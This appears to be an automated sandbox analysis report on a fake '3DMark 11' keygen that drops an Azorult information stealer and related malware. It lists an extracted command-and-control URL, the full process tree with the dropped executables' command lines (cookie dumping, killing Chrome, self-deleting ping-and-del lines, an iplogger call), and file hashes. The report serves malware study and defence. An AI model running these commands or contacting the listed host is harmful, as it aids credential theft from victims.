Resubmissions
18-11-2020 14:18
201118-dj27sn3f52 1018-11-2020 13:42
201118-1arz86e7w6 1018-11-2020 13:38
201118-n8jh228ctn 10Analysis
-
max time kernel
1801s -
max time network
1811s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
18-11-2020 14:18
General
-
Target
3DMark 11 Advanced Edition.bin.exe
Malware Config
Extracted
azorult
http://kvaka.li/1210776429.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
PlugX
PlugX is a RAT (Remote Access Trojan) that has been around since 2008.
-
Nirsoft 8 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 27 IoCs
-
Suspicious Office macro 1 IoCs
Office document equipped with 4.0 macros.
-
UPX packed file 4 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Loads dropped DLL 13 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 4 IoCs
-
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Writes to the Master Boot Record (MBR) 1 TTPs 4 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
-
Suspicious use of SetThreadContext 4 IoCs
-
Drops file in Program Files directory 33 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Kills process with taskkill 2 IoCs
-
Modifies system certificate store 2 TTPs 2 IoCs
-
Runs ping.exe 1 TTPs 5 IoCs
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 2 IoCs
-
Suspicious use of SetWindowsHookEx 21 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\3DMark 11 Advanced Edition.bin.exe"C:\Users\Admin\AppData\Local\Temp\3DMark 11 Advanced Edition.bin.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\intro.exeintro.exe 1O5ZF3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exekeygen-step-2.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.15⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\002.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\002.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\sib68E5.tmp\0\setup.exe"C:\Users\Admin\AppData\Local\Temp\sib68E5.tmp\0\setup.exe" -s5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\9ku5npt6tedk\aliens.exe"C:\Program Files (x86)\9ku5npt6tedk\aliens.exe"6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"7⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\1A27AE19C9E414DC.exeC:\Users\Admin\AppData\Local\Temp\1A27AE19C9E414DC.exe 0011 installp17⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetThreadContext
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\1605712587875.exe"C:\Users\Admin\AppData\Roaming\1605712587875.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605712587875.txt"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\1605712592235.exe"C:\Users\Admin\AppData\Roaming\1605712592235.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605712592235.txt"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\1605712597672.exe"C:\Users\Admin\AppData\Roaming\1605712597672.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605712597672.txt"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\1605712600360.exe"C:\Users\Admin\AppData\Roaming\1605712600360.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605712600360.txt"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exeC:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP8⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\1021C014A4C9A552.exeC:\Users\Admin\AppData\Local\Temp\1021C014A4C9A552.exe /silent8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-GKG9L.tmp\1021C014A4C9A552.tmp"C:\Users\Admin\AppData\Local\Temp\is-GKG9L.tmp\1021C014A4C9A552.tmp" /SL5="$8005C,761193,121344,C:\Users\Admin\AppData\Local\Temp\1021C014A4C9A552.exe" /silent9⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\RearRips\seed.sfx.exe"C:\Program Files (x86)\RearRips\seed.sfx.exe" -pK2j8l614 -s110⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/14Ahe7"10⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\1A27AE19C9E414DC.exe"8⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 39⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\1A27AE19C9E414DC.exeC:\Users\Admin\AppData\Local\Temp\1A27AE19C9E414DC.exe 200 installp17⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe9⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\1A27AE19C9E414DC.exe"8⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 39⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Program Files (x86)\9ku5npt6tedk\aliens.exe"7⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 38⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg2_2qua.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg2_2qua.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall21.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall21.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\hjjgaa.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 4BEE831CF17A398554ED20EEEE4EB308 C2⤵
- Loads dropped DLL
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
MD5
c615d0bfa727f494fee9ecb3f0acf563
SHA16c3509ae64abc299a7afa13552c4fe430071f087
SHA25695d91febc45d03c1ee477c127bcbd332cd6fbce1e91105004af723594e6f0199
SHA512d97256eb93d8e546f5fb5c61bebe61e7dfab316eb7685be83782bd36b28df3f80880e7b823197a4b6bae1af7b9460c4c81357dd44ed199ab93ccaee5acc10e51
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
MD5
7cc103f6fd70c6f3a2d2b9fca0438182
SHA1699bd8924a27516b405ea9a686604b53b4e23372
SHA256dbd9f2128f0b92b21ef99a1d7a0f93f14ebe475dba436d8b1562677821b918a1
SHA51292ec9590e32a0cf810fc5d15ca9d855c86e5b8cb17cf45dd68bcb972bd78692436535adf9f510259d604e0a8ba2e25c6d2616df242261eb7b09a0ca5c6c2c128
-
-
-
MD5
a6279ec92ff948760ce53bba817d6a77
SHA15345505e12f9e4c6d569a226d50e71b5a572dce2
SHA2568b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181
SHA512213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c
-
MD5
a6279ec92ff948760ce53bba817d6a77
SHA15345505e12f9e4c6d569a226d50e71b5a572dce2
SHA2568b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181
SHA512213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c
-
MD5
7fee8223d6e4f82d6cd115a28f0b6d58
SHA11b89c25f25253df23426bd9ff6c9208f1202f58b
SHA256a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59
SHA5123ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4
-
MD5
7fee8223d6e4f82d6cd115a28f0b6d58
SHA11b89c25f25253df23426bd9ff6c9208f1202f58b
SHA256a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59
SHA5123ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4
-
-
-
MD5
ef6f72358cb02551caebe720fbc55f95
SHA1b5ee276e8d479c270eceb497606bd44ee09ff4b8
SHA2566562bdcbf775e04d8238c2b52a4e8df5afa1e35d1d33d1e4508cfe040676c1e5
SHA512ea3f0cf40ed3aa3e43b7a19ed6412027f76f9d2d738e040e6459415aa1e5ef13c29ca830a66430c33e492558f7c5f0cc86e1df9474322f231f8506e49c3a1a90
-
MD5
ef6f72358cb02551caebe720fbc55f95
SHA1b5ee276e8d479c270eceb497606bd44ee09ff4b8
SHA2566562bdcbf775e04d8238c2b52a4e8df5afa1e35d1d33d1e4508cfe040676c1e5
SHA512ea3f0cf40ed3aa3e43b7a19ed6412027f76f9d2d738e040e6459415aa1e5ef13c29ca830a66430c33e492558f7c5f0cc86e1df9474322f231f8506e49c3a1a90
-
-
MD5
ef6f72358cb02551caebe720fbc55f95
SHA1b5ee276e8d479c270eceb497606bd44ee09ff4b8
SHA2566562bdcbf775e04d8238c2b52a4e8df5afa1e35d1d33d1e4508cfe040676c1e5
SHA512ea3f0cf40ed3aa3e43b7a19ed6412027f76f9d2d738e040e6459415aa1e5ef13c29ca830a66430c33e492558f7c5f0cc86e1df9474322f231f8506e49c3a1a90
-
MD5
ef6f72358cb02551caebe720fbc55f95
SHA1b5ee276e8d479c270eceb497606bd44ee09ff4b8
SHA2566562bdcbf775e04d8238c2b52a4e8df5afa1e35d1d33d1e4508cfe040676c1e5
SHA512ea3f0cf40ed3aa3e43b7a19ed6412027f76f9d2d738e040e6459415aa1e5ef13c29ca830a66430c33e492558f7c5f0cc86e1df9474322f231f8506e49c3a1a90
-
-
MD5
ef6f72358cb02551caebe720fbc55f95
SHA1b5ee276e8d479c270eceb497606bd44ee09ff4b8
SHA2566562bdcbf775e04d8238c2b52a4e8df5afa1e35d1d33d1e4508cfe040676c1e5
SHA512ea3f0cf40ed3aa3e43b7a19ed6412027f76f9d2d738e040e6459415aa1e5ef13c29ca830a66430c33e492558f7c5f0cc86e1df9474322f231f8506e49c3a1a90
-
MD5
ef6f72358cb02551caebe720fbc55f95
SHA1b5ee276e8d479c270eceb497606bd44ee09ff4b8
SHA2566562bdcbf775e04d8238c2b52a4e8df5afa1e35d1d33d1e4508cfe040676c1e5
SHA512ea3f0cf40ed3aa3e43b7a19ed6412027f76f9d2d738e040e6459415aa1e5ef13c29ca830a66430c33e492558f7c5f0cc86e1df9474322f231f8506e49c3a1a90
-
-
MD5
ef6f72358cb02551caebe720fbc55f95
SHA1b5ee276e8d479c270eceb497606bd44ee09ff4b8
SHA2566562bdcbf775e04d8238c2b52a4e8df5afa1e35d1d33d1e4508cfe040676c1e5
SHA512ea3f0cf40ed3aa3e43b7a19ed6412027f76f9d2d738e040e6459415aa1e5ef13c29ca830a66430c33e492558f7c5f0cc86e1df9474322f231f8506e49c3a1a90
-
MD5
ef6f72358cb02551caebe720fbc55f95
SHA1b5ee276e8d479c270eceb497606bd44ee09ff4b8
SHA2566562bdcbf775e04d8238c2b52a4e8df5afa1e35d1d33d1e4508cfe040676c1e5
SHA512ea3f0cf40ed3aa3e43b7a19ed6412027f76f9d2d738e040e6459415aa1e5ef13c29ca830a66430c33e492558f7c5f0cc86e1df9474322f231f8506e49c3a1a90
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Filesize
588KB
-
-
Filesize
4.7MB
-
-
-
-
Filesize
588KB
-
-
Filesize
504KB
-
-
-
-
-
-
-
Filesize
504KB
-
-
Filesize
588KB
-
-
Filesize
3.2MB
-
-
Filesize
588KB
-
-
-
-
-
Filesize
588KB
-
-
-
-
Filesize
908KB
-
-
-
Filesize
588KB
-
-
-
-
-
Filesize
588KB
-
Filesize
4.7MB
-
Filesize
4KB
-
-
-
Filesize
588KB
-
Filesize
588KB
-
-
-
Filesize
588KB
-
-
Filesize
588KB
-
-
-
Filesize
588KB
-
-
-
-
Filesize
504KB
-
Filesize
588KB
-
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
-
-
-
-
Filesize
504KB
-
-
Filesize
348KB
-
-
-
-
-
-
-
-
-
Filesize
588KB
-
-